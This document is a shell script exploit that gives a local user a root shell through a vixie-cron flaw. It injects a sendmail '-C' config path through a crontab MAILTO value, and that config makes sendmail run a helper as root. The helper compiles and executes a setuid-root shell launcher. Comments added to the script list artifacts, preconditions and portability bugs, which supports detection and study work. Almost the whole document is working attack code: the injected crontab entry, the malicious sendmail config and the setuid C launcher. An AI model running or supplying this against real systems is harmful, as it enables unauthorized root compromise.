An exploit for a recent vixie-cron vulnerability giving an instant root shell
12248c3d35660af5cfc7fca4f9ef8c8c74e5b0e6b5f36893552c05597f51c5b8
#!/bin/sh
# Historical proof-of-concept against vixie-cron. The crontab installed below
# sets MAILTO to a value beginning with "-C/tmp/vixie-cf"; that value
# presumably reaches sendmail's argument list when cron mails the output of the
# failing job, so sendmail reads an attacker-controlled configuration file.
# That config runs /tmp/vixie-root as the "local" mailer with DefaultUser=0:0,
# and /tmp/vixie-root compiles and installs a setuid-root shell launcher.
#
# Defender notes (everything here is taken from the steps in this script):
#   - Artifacts: /tmp/vixie-cf, /tmp/vixie-root, /tmp/vixie-own3d and
#     /tmp/vixie-own3d.c, sendmail queue files /tmp/df* and /tmp/qf*
#     (QueueDirectory=/tmp), and a crontab entry whose MAILTO starts with "-C".
#     A mode-6755 (setuid+setgid) binary in /tmp is a strong indicator.
#   - Preconditions the script lists as "not verified": an unpatched vixie
#     crontab and a /tmp mounted without noexec/nosuid. A patched cron or a
#     noexec/nosuid /tmp breaks the chain; sendmail builds that drop root
#     privileges when a non-root user supplies -C presumably break it as well.
#
# Script mechanics: the shebang is /bin/sh, but "let" and "&>" are bash-only
# and "echo -n" is shell-dependent, so the script is not portable sh.
clear
echo '------------------------------------------------------------------'
echo 'Marchew Hyperreal Industries <marchew@dione.ids.pl>'
echo 'Stumilowy Las Team <100milowy@gdynia.ids.pl>'
echo '---------------------------- presents ----------------------------'
echo
echo ' -= vixie-cron root sploit by Michal Zalewski <lcamtuf@ids.pl> =-'
echo
echo '[+] Checking dependencies:'
echo -n ' [*] vixie crontab: '
# Requires crontab to be setuid (-u) and executable (-x); "-a" inside [ ] is
# a deprecated test operator.
if [ -u /usr/bin/crontab -a -x /usr/bin/crontab ]; then
echo "OK"
else
echo "NOT FOUND!"
exit 1
fi
echo -n ' [*] Berkeley Sendmail: '
# Only existence is checked; this is the binary that will read the -C config.
if [ -f /usr/sbin/sendmail ]; then
echo "OK"
else
echo "NOT FOUND!"
exit 1
fi
echo -n ' [*] gcc compiler: '
# gcc is needed at delivery time: phase 1 compiles the phase-2 launcher.
if [ -x /usr/bin/gcc ]; then
echo "OK"
else
echo "NOT FOUND!"
exit 1
fi
echo ' [?] Dependiences not verified:'
echo ' [*] proper version of vixie crontab'
echo ' [*] writable /tmp without noexec/nosuid option'
echo '[+] Exploit started.'
echo "[+] Setting up .cf file for sendmail..."
# Minimal sendmail config: queue directory in /tmp, deliveries run as uid/gid
# 0, and the "local" mailer program (P=) is /tmp/vixie-root. The heredoc
# delimiter is unquoted, so the "\$" escapes become literal "$" in the file.
cat >/tmp/vixie-cf <<__eof__
V7/Berkeley
O QueueDirectory=/tmp
O DefaultUser=0:0
R$+ \$#local $: \$1 regular local names
Mlocal, P=/tmp/vixie-root, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40,
T=DNS/RFC822/X-Unix,
A=vixie-root
__eof__
echo '[+] Setting up phase #1 tool (phase #2 tool compiler)...'
# Phase 1: executed by sendmail as the local mailer (hence with the
# DefaultUser identity above); compiles phase 2 and marks it 6755
# (setuid+setgid). No error checking on gcc or chmod.
cat >/tmp/vixie-root <<__eof__
#!/bin/sh
gcc /tmp/vixie-own3d.c -o /tmp/vixie-own3d
chmod 6755 /tmp/vixie-own3d
__eof__
chmod 755 /tmp/vixie-root
echo '[+] Setting up phase #2 tool (rootshell launcher)...'
# Phase 2: setuid launcher. Sets uid and gid to 0, unlinks its own binary so
# it is gone once run, then execs an interactive /bin/sh.
cat >/tmp/vixie-own3d.c <<__eof__
main() {
setuid(0);
setgid(0);
unlink("/tmp/vixie-own3d");
execl("/bin/sh","sh","-i",0);
}
__eof__
echo '[+] Putting evil crontab entry...'
# Injection point: MAILTO starts with "-C/tmp/vixie-cf". The job "nonexist"
# runs every minute and fails, which is what causes cron to invoke sendmail.
# "crontab -" replaces the invoking user's whole crontab with this content.
crontab - <<__eof__
MAILTO='-C/tmp/vixie-cf dupek'
* * * * * nonexist
__eof__
echo '[+] Patience is a virtue... Wait up to 60 seconds.'
# Poll for the phase-2 binary: 50 iterations x 2 s, i.e. up to ~100 s despite
# the "60 seconds" message. ILE=1000 ends the loop early once the file
# appears. "let" is a bashism and $ILE is unquoted.
ILE=0
echo -n '[+] Tick.'
while [ $ILE -lt 50 ]; do
sleep 2
let ILE=ILE+1
test -f /tmp/vixie-own3d && ILE=1000
echo -n '.'
done
echo
echo '[+] Huh, done. Removing crontab entry...'
# NOTE: "crontab -r" deletes the user's entire crontab, not just the injected
# line; any crontab the user had before running this script is already lost.
crontab -r
echo '[+] Removing helper files...'
# Cleanup of the config, phase-1 script, C source and the sendmail queue files
# (df*/qf*) created because QueueDirectory=/tmp. "&>" is bash syntax; under a
# POSIX sh this line backgrounds rm and leaves a bare ">/dev/null" redirect.
rm -f /tmp/vixie-own3d.c /tmp/vixie-root /tmp/vixie-cf /tmp/df* /tmp/qf* &>/dev/null
echo '[*] And now...'
# If phase 2 produced the launcher, run it; the launcher removes its own file
# before exec'ing the shell (see the unlink() above).
if [ -f /tmp/vixie-own3d ]; then
echo '[+] Entering root shell, babe :)'
echo
/tmp/vixie-own3d
echo
else
echo '[-] Oops, no root shell found, patched system or configuration problem :('
fi
echo '[*] Exploit done.'